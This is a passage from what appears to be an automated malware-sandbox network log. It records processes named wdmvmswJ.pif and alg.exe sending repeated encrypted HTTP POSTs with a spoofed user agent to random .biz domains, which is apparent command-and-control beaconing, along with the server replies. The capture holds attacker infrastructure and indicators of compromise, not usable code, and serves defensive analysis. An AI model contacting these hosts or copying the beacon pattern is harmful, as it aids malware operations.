                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.910295963 CET778OUTData Raw: c7 03 f8 4e 1b f6 8f 7a fe 02 00 00 5e 3f 6f 2d 64 7b 86 4f 52 08 50 0f 3b 80 a4 96 4e 51 bf 2c c8 fc 6a f9 c5 73 48 36 74 00 38 ef 31 a5 01 84 34 da 00 0d bb 80 53 81 c9 02 66 3f 38 00 69 48 b0 b0 fc c1 c6 77 7b 59 09 c3 21 18 52 a3 c2 a2 7b b6
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Nz^?o-d{ORP;NQ,jsH6t814Sf?8iHw{Y!R{0%4Ytc|E}0GV z78S&vp|; 2Cb)6x)]*wlz@l>N[+5M8 V^1Sd\
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.368484020 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=814916752eabbc086bbb2bdac61ff438|173.254.250.82|1730445867|1730445867|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        88192.168.2.84980485.214.228.140804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:26.607357979 CET354OUTPOST /kfmcpedbjr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:26.607384920 CET802OUTData Raw: 29 89 9d f4 a7 14 2e f0 16 03 00 00 79 62 dc 14 76 5c 7a 5a 61 69 c5 97 d6 ea a0 7b be 94 04 38 07 25 7a da bc c2 fa a9 10 95 41 a0 4e 56 7c 02 da 6a b9 83 a4 b9 15 de 6a 16 ff 84 74 4f 7c 6d d0 d9 4a 7c 92 4d 58 8e 35 d7 1e cb 4c e9 e4 f1 81 18
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ).ybv\zZai{8%zANV|jjtO|mJ|MX5L(4R)[9Y8_A~w#}$W]l=d0!Rc@LJ;X)2q\,|oMZ2[x+4_o`]IK\xhg,.W3&z


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        89192.168.2.84980585.214.228.140804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.077306986 CET356OUTPOST /rifmhdkgmasf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.077476025 CET802OUTData Raw: 6b 5a 49 f7 6f af 63 a0 16 03 00 00 6a 93 41 c5 fc 82 04 d7 ba 39 63 75 77 dd 22 b2 46 c9 b9 42 ee e0 ae 36 3a 6e 4c 49 ea c8 8f f1 f6 fa e1 1a ba 81 67 64 e5 78 c0 f4 e6 b6 f9 55 4b 1a 37 51 ba f9 82 b4 31 ad 8e 3d 2d 81 5e 89 4d 45 fe 99 e8 d0
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: kZIocjA9cuw"FB6:nLIgdxUK7Q1=-^MEvy[LPjuIibQH,Ga.rWx!-+W:jsi]QZ <IoUrv6H zHHYb#Vrp5lh
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.943753958 CET161INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.27.2
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.943802118 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        90192.168.2.84980618.246.231.120804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.573637962 CET356OUTPOST /tbncyidxtibogxq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.573637962 CET778OUTData Raw: 66 f2 b4 b1 9c 25 e2 11 fe 02 00 00 75 b3 7c af 9e 5a bb a5 1a fb e8 5b 65 2b 7a 1e 5b 0e 48 84 0f 7c cc 13 73 c0 0e 57 2d d4 35 a8 a8 37 a8 09 2b 88 cd da 10 26 13 23 7b f9 44 c6 00 73 90 c2 85 6e c8 77 61 70 41 71 d3 d2 da a5 58 4b 94 cd b7 dc
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: f%u|Z[e+z[H|sW-57+&#{DsnwapAqXK%}D%>29e,FTNMN)85r~in^1is!9CyE_cQdf'smyNiu_(l.j-m$G8LyW4
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.400188923 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=e0d331f85eea7389c47a6836cf9f9dba|173.254.250.82|1730445868|1730445868|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        91192.168.2.84980747.129.31.212804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.992387056 CET352OUTPOST /eakdwqhsn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.992409945 CET802OUTData Raw: 68 27 56 32 53 02 2c bc 16 03 00 00 2d 21 38 c7 ae 8a 16 8a a0 ff 6b 93 79 18 d6 19 bd 47 f2 8f 1a 72 94 e6 7c 78 f7 1b a3 32 43 5c 4d 67 0b 3e 13 84 dc 21 1e a4 41 a1 2f 74 db 90 25 ed e6 3c 65 d1 99 32 df 05 79 42 ad f9 f8 93 fe 5d 9c e6 bf 14
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: h'V2S,-!8kyGr|x2C\Mg>!A/t%<e2yB]Na!H"Z8/:E~2^M2jA6t)Cmxhk8r86[Uj?2h8^kZ>9f"#G@N\%p~V1Wo*/'Yu//|OOj
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.442374945 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b1025ef6775af7d205078f97d152136a|173.254.250.82|1730445869|1730445869|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        92192.168.2.84980818.208.156.248804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.533565998 CET357OUTPOST /bcjrqnssupbqc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.533608913 CET778OUTData Raw: d7 fc 74 03 5e 66 70 9d fe 02 00 00 ce 4f ae c3 5d 50 c9 17 82 92 48 97 14 bd 19 ff be 54 d2 6a f0 cf 8c 1e 40 2b e2 2e b8 c2 11 89 8d 69 3e 46 c7 a7 38 dd 68 85 85 33 b1 3c cc b7 62 fc 18 af 34 c8 3a a6 3f 64 0c 46 b9 ae 7f 24 44 47 40 0d 47 92
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: t^fpO]PHTj@+.i>F8h3<b4:?dF$DG@G#h*q{EdDKY%oqK?7nEV'9w=v*W!G:K17W9?+v.Fx\Xb`qz0tE"i(
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.203380108 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=256edeced3cf5e9616feda4f93da4dbb|173.254.250.82|1730445869|1730445869|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        93192.168.2.84980913.251.16.150804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.329370975 CET346OUTPOST /taks HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.329399109 CET778OUTData Raw: 01 cc a5 e0 8a 6a 60 2f fe 02 00 00 cc a3 33 01 51 ae 51 06 21 24 ac 2b 55 62 eb df b9 1e cd 89 69 4a 54 38 fc 61 47 0e 25 0a 97 59 55 6c 61 91 31 e4 31 69 a9 21 ea c9 fd b8 ff 5c 44 c6 50 2f 3f 3d 14 13 25 66 52 81 32 5b 34 53 5d a8 5e bc 09 5f
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: j`/3QQ!$+UbiJT8aG%YUla11i!\DP/?=%fR2[4S]^_~JSA2H}+hybkL*;r<(3S+d:r]t-EB!(|MwIpk90\};#{x]5V%gL2TBYfh&|o11/+D~
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.748615980 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=a88ef51d7b5b0d9d32b6053eba3278e6|173.254.250.82|1730445870|1730445870|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        94192.168.2.84981034.211.97.45804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.675199986 CET355OUTPOST /qbllddvxueecww HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.675215960 CET802OUTData Raw: 30 6a b8 88 dd c2 d8 f2 16 03 00 00 5c 94 fe af bb e6 04 9d 21 26 f3 28 a3 2b 66 4d da e0 76 b4 9e 95 36 35 35 c9 46 27 2f 2b d2 f4 ca bd 51 f0 36 67 a1 7c b6 c4 c5 8e 57 cf 71 3e 4e b8 b9 0d fe ce cf b7 f2 73 57 db 1c 75 68 a2 e5 5c aa 61 3e 7f
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0j\!&(+fMv655F'/+Q6g|Wq>NsWuh\a>;h*8||*<h0U?~MR^Sg)&~C%wP9c'7E [aQ:F5[^SABKpN)O]C^QZ8(tl,f%;(%WFO
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.511961937 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5c93d843769cf7c6d76da733fa099ca2|173.254.250.82|1730445870|1730445870|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        95192.168.2.84981247.129.31.212804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.561356068 CET353OUTPOST /jaypbwnkuad HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.561374903 CET802OUTData Raw: 63 e1 1a 43 7d 22 e5 75 16 03 00 00 b4 d9 a4 9b 0c 25 ff dc 25 e9 cb dd 28 2d ff c3 a5 60 d8 69 bd 6d 8f bc b4 0d 53 77 a7 b1 fc a3 ab 34 25 e1 d5 e8 de 03 09 a2 45 41 e7 a4 4c 1b 8a 5a 7c 25 a7 53 9a 5d 11 a4 64 3f 20 98 b2 34 63 d2 cb c5 e6 bd
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: cC}"u%%(-`imSw4%EALZ|%S]d? 4cbEYGb|Wy{vGZaTA:)=W.B>x91FP!}_7SzeJGd]UwpPH7a45xG7zpk


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        96192.168.2.84981347.129.31.212804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.093075037 CET344OUTPOST /om HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.093094110 CET802OUTData Raw: 21 58 d3 2e 24 dd d3 c1 16 03 00 00 b0 25 1e 01 53 7c 31 cc 23 11 41 5b f4 ff 09 8a 6e cb e0 bc 06 b3 dc fa e1 cf 2b c3 e2 03 6a fa da 53 9f 62 0b 30 2d 74 0e 35 63 20 02 f5 ea 59 d9 96 0b 99 75 73 0c 0a 26 2c 6d c9 06 60 b1 7d 65 be 75 ef 40 a3
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: !X.$%S|1#A[n+jSb0-t5c Yus&,m`}eu@023t$~L"CXecxABAXKfa71tv6=>;0\Ei-\f H4 d?)iw:$DwZ|x(zw. VEm-J=
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.561674118 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=22820d2eaab8110df296904ade931858|173.254.250.82|1730445872|1730445872|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        97192.168.2.84981413.251.16.150804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.302165031 CET349OUTPOST /cnub HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.302191019 CET778OUTData Raw: b3 fa 31 57 b4 9c 99 77 fe 02 00 00 63 ba ba 11 ea e8 65 c2 b7 b6 38 1d d7 81 13 c9 c8 75 33 56 23 ff f4 66 fa db 93 27 8b e8 e2 8e 79 25 8b c9 2e eb 5a 1b cb 1e 44 d6 84 57 1b dc 9c b6 70 84 90 30 ba 89 4c 67 45 47 2f 0f 0d e9 45 5c fe 78 43 76
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 1Wwce8u3V#f'y%.ZDWp0LgEG/E\xCvw>D?9Vs&C\2{5X*&Ws};`.{Q8gOIWEVPh)fg pT_3K;U?MSWK]F9{7C@gx|
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.736144066 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=207136468128fafd5992cbbde241902f|173.254.250.82|1730445872|1730445872|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


